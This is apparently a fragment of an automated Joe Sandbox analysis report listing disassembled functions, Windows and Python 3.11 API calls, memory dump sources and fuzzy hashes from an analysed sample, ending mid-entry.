DName::DName.LIBVCRUNTIME ref: 00007FFE1A49A8C6
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49A8D6
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49A8F3

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: Name::operator+$NameName::
String ID:
API String ID: 168861036-0
Opcode ID: 98efd56155e24b1ceec94087ea0ccb087ffd731ce7e45ec66b02000ff67e82c1
Instruction ID: ce46d47f4568633d36b52eda8d2fd54de38ff0eeb6a0614e7fdce67b0a8b2ada
Opcode Fuzzy Hash: 98efd56155e24b1ceec94087ea0ccb087ffd731ce7e45ec66b02000ff67e82c1
Instruction Fuzzy Hash: B1514A72B18E6689EB31CF26D8417BD37A0BB48F64F5444B2DA1E077A5DF399462C700

Function 00007FFDFF200D30 Relevance: 6.1, APIs: 4, Instructions: 114pipeCOMMON

Download Yara Rule

APIs

GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFDFF1A4BC8), ref: 00007FFDFF200D63
GetFileInformationByHandle.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFDFF1A4BC8), ref: 00007FFDFF200DC5
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFDFF1A4BC8), ref: 00007FFDFF200E3C
PeekNamedPipe.API-MS-WIN-CORE-NAMEDPIPE-L1-1-0 ref: 00007FFDFF200E88

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: fc1fac4533829cd9723f662f28ef85f4d77736735aed57f6637f7326f1a08d06
Instruction ID: 16055bff3826422b4568be43cbea6bbfade2caed42767f80399ffb79c666c1b2
Opcode Fuzzy Hash: fc1fac4533829cd9723f662f28ef85f4d77736735aed57f6637f7326f1a08d06
Instruction Fuzzy Hash: 6F415723F086418AFB50DFA1D4A0BBD27A1EB48B88F188635EE69D779DDF38D4418340

Function 00007FFE1A49CC48 Relevance: 6.1, APIs: 4, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FFE1A49E72C: Replicator::operator[].LIBVCRUNTIME ref: 00007FFE1A49E786

Part of subcall function 00007FFE1A49C78C: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49C81D
Part of subcall function 00007FFE1A49C78C: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49C856
Part of subcall function 00007FFE1A49C78C: DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49CB83

DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49CCC6
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49CCD5
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49CD52
DName::operator+.LIBVCRUNTIME ref: 00007FFE1A49CD61

Memory Dump Source

Source File: 00000001.00000002.3019088524.00007FFE1A491000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A490000, based on PE: true

Associated: 00000001.00000002.3019066108.00007FFE1A490000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019117543.00007FFE1A4A1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019139929.00007FFE1A4A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.3019163495.00007FFE1A4A7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe1a490000_file.jbxd

Similarity

API ID: Name::operator+$Replicator::operator[]
String ID:
API String ID: 3863519203-0
Opcode ID: 59a8e1a8bea4fa0d3053ac7b282f3cf586ef513a0d49dabd13085b0ba4a6c699
Instruction ID: e0896b3b4cb292e2a1ed9b4fb8cf11f72f2f837d43740d967ddc138dccf40efd
Opcode Fuzzy Hash: 59a8e1a8bea4fa0d3053ac7b282f3cf586ef513a0d49dabd13085b0ba4a6c699
Instruction Fuzzy Hash: 22416672B04B95C9FB21CF65D8403BC3BA0BB49B68F5481A6DA4E5776ADF3C9861C340

Function 00007FFDFF19BDC0 Relevance: 6.1, APIs: 4, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FFDFF19B904: DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19B995
Part of subcall function 00007FFDFF19B904: DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19B9CE
Part of subcall function 00007FFDFF19B904: DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19BCF7

DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19BE3B
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19BE4A
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19BEC6
DName::operator+.LIBVCRUNTIME ref: 00007FFDFF19BED5

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: 7ed4d0ccd550d876c0167e010eb9912fd4c0e746c049cf95e263a209b0ccf72f
Instruction ID: 07e1bb827878181f9280cf5e91a97c98d0095984c1eb1bc4247c0fcd2903413f
Opcode Fuzzy Hash: 7ed4d0ccd550d876c0167e010eb9912fd4c0e746c049cf95e263a209b0ccf72f
Instruction Fuzzy Hash: F3416573E08B49C9EB21CF64E4A07AC37A0B744B4CF548225DB6D977A9DB389540C790

Function 00007FFE14633BA8 Relevance: 6.1, APIs: 4, Instructions: 75threadtimeCOMMON

Download Yara Rule

APIs

_PyTime_AsTimeval_clamp.PYTHON311 ref: 00007FFE14633BFD
PyEval_SaveThread.PYTHON311 ref: 00007FFE14633C3C
select.WS2_32 ref: 00007FFE14633C70
PyEval_RestoreThread.PYTHON311 ref: 00007FFE14633C7B

Memory Dump Source

Source File: 00000001.00000002.3018862329.00007FFE14631000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE14630000, based on PE: true

Associated: 00000001.00000002.3018842963.00007FFE14630000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018885111.00007FFE14638000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018906517.00007FFE14640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018928348.00007FFE14642000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe14630000_file.jbxd

Similarity

API ID: Eval_Thread$RestoreSaveTime_Timeval_clampselect
String ID:
API String ID: 3905867726-0
Opcode ID: 947ac965c37a758a9fa8a6c53622192885134dfb450c88c4b3ce8717958678c4
Instruction ID: 9ec62d79bffdbb369e93d6cab4097e6dfbdb941b4dde29ec2a6dc3a4cfc682b8
Opcode Fuzzy Hash: 947ac965c37a758a9fa8a6c53622192885134dfb450c88c4b3ce8717958678c4
Instruction Fuzzy Hash: BA319C72B08FC286D7608F16A8843A563A0FB89BBCF540175DA5D477A4DF3DD4598740

Function 00007FFDFF175B90 Relevance: 6.1, APIs: 4, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFF175C2C: GetModuleHandleExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-1-0(?,?,?,00007FFDFF175BB8,?,?,?,?,?,00007FFDFF16F126), ref: 00007FFDFF175C70

CreateThread.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?,?,?,?,00007FFDFF16F126), ref: 00007FFDFF175BE1
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,00007FFDFF16F126), ref: 00007FFDFF1AFD3D

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: CreateErrorHandleLastModuleThread
String ID:
API String ID: 182981130-0
Opcode ID: 89bc01ccb25fcbf5eaca3e32c8da274664b9296c0f32c6cf4ca3c541ca0813c3
Instruction ID: aa32ee59cd7c33a5cbce4ffe8b2a8722f3b684b96b8e4d45ac3bc9ef77996da8
Opcode Fuzzy Hash: 89bc01ccb25fcbf5eaca3e32c8da274664b9296c0f32c6cf4ca3c541ca0813c3
Instruction Fuzzy Hash: 71216D27F0D74282EF159B25A42097963A4AF94B90F140A35DA7E877DDDF3CE440C640

Function 00007FFDFF165D29 Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

__security_init_cookie.LIBCMT ref: 00007FFDFF165D58
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF165D94
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF165DA2
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0 ref: 00007FFDFF165DB6
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFDFF165DD7

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: ErrorLastValue$__security_init_cookie
String ID:
API String ID: 2363391822-0
Opcode ID: c92e84237869a2f46d1d11d4e6de887c950120c8ddf7338526ec6e053cba76b7
Instruction ID: 4a29b3b325b0b510ce0ac7083448888004aaf4d80d134757a5e5e4418f9cd003
Opcode Fuzzy Hash: c92e84237869a2f46d1d11d4e6de887c950120c8ddf7338526ec6e053cba76b7
Instruction Fuzzy Hash: E911D332F0868286EB145B25E9648786361BF85BA0F184330EA7D437DDDF3CE8519700

Function 00007FFDFF201C98 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FFDFF201E12,?,?,?,?,00007FFDFF1AC91D), ref: 00007FFDFF201CD2
FlushFileBuffers.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FFDFF201E12,?,?,?,?,00007FFDFF1AC91D), ref: 00007FFDFF201D03
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF201E12,?,?,?,?,00007FFDFF1AC91D), ref: 00007FFDFF201D0F

Part of subcall function 00007FFDFF168790: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF1A5C6B,?,?,?,?,00007FFDFF154577,?,?,?,?,?,00007FFDFF1A64BB), ref: 00007FFDFF16879F
Part of subcall function 00007FFDFF168790: FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1A5C6B,?,?,?,?,00007FFDFF154577,?,?,?,?,?,00007FFDFF1A64BB), ref: 00007FFDFF1687AD
Part of subcall function 00007FFDFF168790: FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1A5C6B,?,?,?,?,00007FFDFF154577,?,?,?,?,?,00007FFDFF1A64BB), ref: 00007FFDFF1687C1
Part of subcall function 00007FFDFF168790: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF1A5C6B,?,?,?,?,00007FFDFF154577,?,?,?,?,?,00007FFDFF1A64BB), ref: 00007FFDFF1687E1

LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FFDFF201E12,?,?,?,?,00007FFDFF1AC91D), ref: 00007FFDFF201D45

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: ErrorLast$CriticalSectionValue$BuffersEnterFileFlushLeave
String ID:
API String ID: 2707087786-0
Opcode ID: 2a7ed216b7cfd1984dbd8887526881ef661654935faad841d6089f9f7dfe2dda
Instruction ID: 4c688013bf391e4c0d6f11a7078ebc584b26891ec00d29ff877cae999b5e714f
Opcode Fuzzy Hash: 2a7ed216b7cfd1984dbd8887526881ef661654935faad841d6089f9f7dfe2dda
Instruction Fuzzy Hash: E4219072B24F8692DF10DF59E4A45696361FB98F84B845231DB2E873A9DF3CE155C300

Function 00007FF6399B2030 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF6399B2064
SetWindowLongPtrW.USER32 ref: 00007FF6399B2086
GetWindowLongPtrW.USER32 ref: 00007FF6399B20B0
InvalidateRect.USER32 ref: 00007FF6399B20D0

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
Instruction ID: 603266708baba3f9ddabf25398ad0796a066ed683afdfd336174356a0526ee19
Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
Instruction Fuzzy Hash: 1C11A921E0814642FA559F69E5842BD52A3EF99B80F8C8031DE498BBDFCD3DD4C1AB40

Function 00007FFE14634CA4 Relevance: 6.0, APIs: 4, Instructions: 43threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE14633864: PyErr_SetString.PYTHON311 ref: 00007FFE1463389A

memset.VCRUNTIME140 ref: 00007FFE14634CF0
PyEval_SaveThread.PYTHON311 ref: 00007FFE14634CF5
getsockname.WS2_32 ref: 00007FFE14634D0C
PyEval_RestoreThread.PYTHON311 ref: 00007FFE14634D17

Memory Dump Source

Source File: 00000001.00000002.3018862329.00007FFE14631000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE14630000, based on PE: true

Associated: 00000001.00000002.3018842963.00007FFE14630000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018885111.00007FFE14638000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018906517.00007FFE14640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018928348.00007FFE14642000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe14630000_file.jbxd

Similarity

API ID: Eval_Thread$Err_RestoreSaveStringgetsocknamememset
String ID:
API String ID: 772546412-0
Opcode ID: 1577330f62de6ded43e8dddc616ca128f006a8c56b02915f3c7181489a52fc15
Instruction ID: 99282031e05f6cfd70b5d2ff0a6273c00fb675d75f367914814851ffa7f67a6a
Opcode Fuzzy Hash: 1577330f62de6ded43e8dddc616ca128f006a8c56b02915f3c7181489a52fc15
Instruction Fuzzy Hash: BD11242561CFC282EA709B53F4803AAA361FF85798F004172DA8E07B65DF3CE1498740

Function 00007FF6399BC330 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6399BC35C
GetCurrentThreadId.KERNEL32 ref: 00007FF6399BC36A
GetCurrentProcessId.KERNEL32 ref: 00007FF6399BC376
QueryPerformanceCounter.KERNEL32 ref: 00007FF6399BC386

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
Instruction ID: dcbf818b759eaf3a0385295f69b01b73c162a66eee838043a4dd22f3f8bae4f1
Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
Instruction Fuzzy Hash: 33117022B14F068AEB00CF60E8442B933A4FB69758F481E35DA2D877ADDF7CD5548740

Function 00007FFDFF16878E Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF1A5C6B,?,?,?,?,00007FFDFF154577,?,?,?,?,?,00007FFDFF1A64BB), ref: 00007FFDFF16879F
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1A5C6B,?,?,?,?,00007FFDFF154577,?,?,?,?,?,00007FFDFF1A64BB), ref: 00007FFDFF1687AD
FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1A5C6B,?,?,?,?,00007FFDFF154577,?,?,?,?,?,00007FFDFF1A64BB), ref: 00007FFDFF1687C1
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF1A5C6B,?,?,?,?,00007FFDFF154577,?,?,?,?,?,00007FFDFF1A64BB), ref: 00007FFDFF1687E1
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1A5C6B,?,?,?,?,00007FFDFF154577,?,?,?,?,?,00007FFDFF1A64BB), ref: 00007FFDFF16880B
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1A5C6B,?,?,?,?,00007FFDFF154577,?,?,?,?,?,00007FFDFF1A64BB), ref: 00007FFDFF168834
FlsSetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1A5C6B,?,?,?,?,00007FFDFF154577,?,?,?,?,?,00007FFDFF1A64BB), ref: 00007FFDFF168846

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: ab028f74ab3c42266c8993aa2a8dbaa1908713946646ff6fb84434c437b9511d
Instruction ID: 5d55e64824edd95689692488424a26603f30bd0df5a360e4fb87267f7869749e
Opcode Fuzzy Hash: ab028f74ab3c42266c8993aa2a8dbaa1908713946646ff6fb84434c437b9511d
Instruction Fuzzy Hash: 65018426F09A5246EB209B79E4648382760FF85B74B080334DA3D837DDEF6CE8558304

Function 00007FFE14634864 Relevance: 6.0, APIs: 4, Instructions: 30threadCOMMON

Download Yara Rule

APIs

PyEval_SaveThread.PYTHON311 ref: 00007FFE14634888
closesocket.WS2_32 ref: 00007FFE14634894
PyEval_RestoreThread.PYTHON311 ref: 00007FFE1463489F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE146348AE

Memory Dump Source

Source File: 00000001.00000002.3018862329.00007FFE14631000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE14630000, based on PE: true

Associated: 00000001.00000002.3018842963.00007FFE14630000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018885111.00007FFE14638000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018906517.00007FFE14640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.3018928348.00007FFE14642000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe14630000_file.jbxd

Similarity

API ID: Eval_Thread$RestoreSave_errnoclosesocket
String ID:
API String ID: 1624953543-0
Opcode ID: 1179f49cef2614599ac27385311664bb38b10ace598ec30c3f873f2a9e03a6a8
Instruction ID: a670616d1509756cf966f890e21a523766a063164bd8b6ae03c55bae703a2f1d
Opcode Fuzzy Hash: 1179f49cef2614599ac27385311664bb38b10ace598ec30c3f873f2a9e03a6a8
Instruction Fuzzy Hash: B8F0FF25A18FD586E6545B56B88406973A0EF45BB9B140770DA7E037F4CF7CD8498280

Function 00007FFDFF1705F0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 234COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFF158354: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF1B086F,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF158363
Part of subcall function 00007FFDFF158354: FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1B086F,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF158371
Part of subcall function 00007FFDFF158354: FlsGetValue.API-MS-WIN-CORE-FIBERS-L1-1-0(?,?,?,00007FFDFF1B086F,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF158385
Part of subcall function 00007FFDFF158354: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FFDFF1B086F,?,?,?,?,?,00007FFDFF1785F0), ref: 00007FFDFF1583A1

GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,?,00000092,?,?,CCCCCCC338C48348,00007FFDFF164BF3), ref: 00007FFDFF170694
IsValidCodePage.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FFDFF1706B2

Strings

utf8, xrefs: 00007FFDFF1AECE1

Memory Dump Source

Source File: 00000001.00000002.3018679128.00007FFDFF151000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FFDFF150000, based on PE: true

Associated: 00000001.00000002.3018656665.00007FFDFF150000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018757970.00007FFDFF213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018794219.00007FFDFF24E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3018816816.00007FFDFF251000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffdff150000_file.jbxd

Similarity

API ID: ErrorLastValue$CodePageValid
String ID: utf8
API String ID: 3310734898-905460609
Opcode ID: 99a36c8dbbc7d0be6f959b360fd60edaaa7f1736fdafd14fb5b43052d4e0ecc6
Instruction ID: 0255bf52e318234b5776294878bc3bde1675fbea53c482f8c2052a2a4c76f956
Opcode Fuzzy Hash: 99a36c8dbbc7d0be6f959b360fd60edaaa7f1736fdafd14fb5b43052d4e0ecc6
Instruction Fuzzy Hash: B8919E23F0864281EB649B12E470EBA23A4AB54B84F454235DABD877DDEF3DE945C740

Function 00007FF6399D4E2C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6399D0A70: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6399D0AA3

_get_daylight.LIBCMT ref: 00007FF6399D4F44
_get_daylight.LIBCMT ref: 00007FF6399D4F55

Strings

?, xrefs: 00007FF6399D4ED5

Memory Dump Source

Source File: 00000001.00000002.3016959860.00007FF6399B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6399B0000, based on PE: true

Associated: 00000001.00000002.3016941257.00007FF6399B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017017692.00007FF6399DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017043415.00007FF6399F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF6399F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.3017080594.00007FF639A09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6399b0000_file.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 30789dec6190b383a199f118b84c25ff7dc7ec79571e837530472d1d90a39620
Instruction ID: fe72fabdda4bc426cb955c9b0f78cef64411df7b5e74fe6b4291b00e7cf3a812
Opcode Fuzzy Hash: 30789dec6190b383a199f118b84c25ff7dc7ec79571e837530472d1d90a39620
Instruction Fuzzy Hash: 1A41F912B0868296FB249F259481379A756EF90BA4F184235EE5D86BEFDF3CD4819F00

Function 00007FFE1A4949B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

